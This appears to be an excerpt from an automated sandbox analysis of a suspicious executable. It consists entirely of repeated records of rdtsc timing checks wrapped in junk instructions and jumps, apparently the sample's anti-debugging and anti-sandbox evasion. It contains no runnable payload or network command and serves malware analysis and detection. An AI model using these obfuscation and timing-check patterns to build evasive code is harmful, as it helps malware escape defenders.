                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD29A0 second address: DD29A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD29A8 second address: DD29AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD29AE second address: DD29BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F0F70ECA9A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD2C61 second address: DD2C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jnp 00007F0F7085C596h 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD2C78 second address: DD2C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD2C7F second address: DD2C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD2F37 second address: DD2F41 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0F70ECA9A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A77D second address: D8A783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C6E2 second address: D6C6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C6E6 second address: D6C6EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C6EA second address: D6C702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F0F70ECA9A8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F0F70ECA9A6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D28E second address: D5D297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8103 second address: DD810C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8840 second address: DD8858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F0F7085C59Fh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8858 second address: DD885E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD885E second address: DD8871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8871 second address: DD887D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD887D second address: DD8881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8BAA second address: DD8BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0F70ECA9A6h 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDCD35 second address: DDCD3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDCD3B second address: DDCD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDCD41 second address: DDCD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6247F second address: D624B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F70ECA9B7h 0x00000009 jmp 00007F0F70ECA9B8h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D624B2 second address: D624B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9F66 second address: DA9F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9F6A second address: DA9F85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jl 00007F0F7085C5B4h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA2B1 second address: DAA2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA2B8 second address: DAA2CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0F7085C596h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA771 second address: DAA775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA775 second address: DAA7B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007F0F7085C5A9h 0x0000000f mov dx, 5641h 0x00000013 pop edx 0x00000014 push 00000004h 0x00000016 mov edx, 08B738B4h 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F0F7085C59Ch 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA7B3 second address: DAA7B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA7B8 second address: DAA7BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAFF5 second address: D8A77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F0F70ECA9ADh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F0F70ECA9A8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 xor dword ptr [ebp+122D1877h], edi 0x0000002d call dword ptr [ebp+122D303Ch] 0x00000033 pushad 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDBF29 second address: DDBF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F0F7085C5B4h 0x0000000b pushad 0x0000000c jne 00007F0F7085C596h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC1D2 second address: DDC1F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jmp 00007F0F70ECA9B7h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC5F5 second address: DDC636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A0h 0x00000007 jo 00007F0F7085C5AEh 0x0000000d jmp 00007F0F7085C59Dh 0x00000012 jmp 00007F0F7085C59Bh 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0F7085C59Dh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC636 second address: DDC644 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F70ECA9A8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC644 second address: DDC64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC8CE second address: DDC90F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0F70ECA9A6h 0x00000008 jmp 00007F0F70ECA9B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0F70ECA9B7h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC90F second address: DDC913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6086 second address: DE60AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F0F70ECA9BCh 0x0000000b jmp 00007F0F70ECA9B6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE60AF second address: DE60B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE60B4 second address: DE60BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE5C0B second address: DE5C36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F0F7085C59Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE5C36 second address: DE5C5B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F0F70ECA9B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F0F70ECA9ACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE8BDC second address: DE8BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jc 00007F0F7085C596h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE8614 second address: DE862B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0F70ECA9A6h 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F0F70ECA9A6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE878D second address: DE87BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F7085C5A2h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F7085C59Eh 0x00000014 jl 00007F0F7085C596h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED28B second address: DED2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F70ECA9B6h 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F0F70ECA9A6h 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F0F70ECA9A6h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED2BE second address: DED2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED2C2 second address: DED2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F70ECA9ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0F70ECA9AFh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC9E5 second address: DEC9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jno 00007F0F7085C596h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC9F5 second address: DECA08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F70ECA9AAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DECA08 second address: DECA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DECCDA second address: DECCDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0DAB second address: DF0DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007F0F7085C596h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F0F7085C59Ch 0x00000018 jnl 00007F0F7085C596h 0x0000001e popad 0x0000001f push esi 0x00000020 jmp 00007F0F7085C5A5h 0x00000025 pop esi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF011D second address: DF0123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0123 second address: DF0128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0128 second address: DF013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0F70ECA9A6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF013A second address: DF0140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0267 second address: DF026B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF026B second address: DF0271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0271 second address: DF0277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0277 second address: DF0281 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F7085C59Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0281 second address: DF02A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F0F70ECA9B9h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF06DB second address: DF06F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF06F5 second address: DF071D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F70ECA9A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F0F70ECA9ACh 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 js 00007F0F70ECA9A6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF071D second address: DF0721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF09A4 second address: DF09B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F0F70ECA9A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF09B0 second address: DF09B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65A63 second address: D65A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B8h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F0F70ECA9A6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65A8B second address: D65A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4809 second address: DF485D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007F0F70ECA9A8h 0x0000000b jng 00007F0F70ECA9EDh 0x00000011 pushad 0x00000012 jmp 00007F0F70ECA9B9h 0x00000017 jg 00007F0F70ECA9A6h 0x0000001d jmp 00007F0F70ECA9B0h 0x00000022 ja 00007F0F70ECA9A6h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c pop eax 0x0000002d jp 00007F0F70ECA9A6h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF499C second address: DF49C3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F7085C596h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0F7085C59Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 jp 00007F0F7085C596h 0x0000001c pop esi 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4C70 second address: DF4C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4C76 second address: DF4C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA9AF second address: DAA9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA9B4 second address: DAA9BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5209 second address: DF5210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5D2B second address: DF5D30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5D30 second address: DF5D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F70ECA9B7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F0F70ECA9A6h 0x00000015 jg 00007F0F70ECA9A6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFB8A6 second address: DFB8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F7085C59Ch 0x00000009 jp 00007F0F7085C596h 0x0000000f popad 0x00000010 push esi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02B6C second address: E02B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02CDF second address: E02CF7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F7085C59Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02CF7 second address: E02D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F70ECA9AFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0EA17 second address: E0EA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0EA24 second address: E0EA4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B9h 0x00000007 jnp 00007F0F70ECA9A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0EA4A second address: E0EA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D204 second address: E0D209 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D36D second address: E0D391 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0F7085C5A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F0F7085C59Ah 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D53B second address: E0D543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
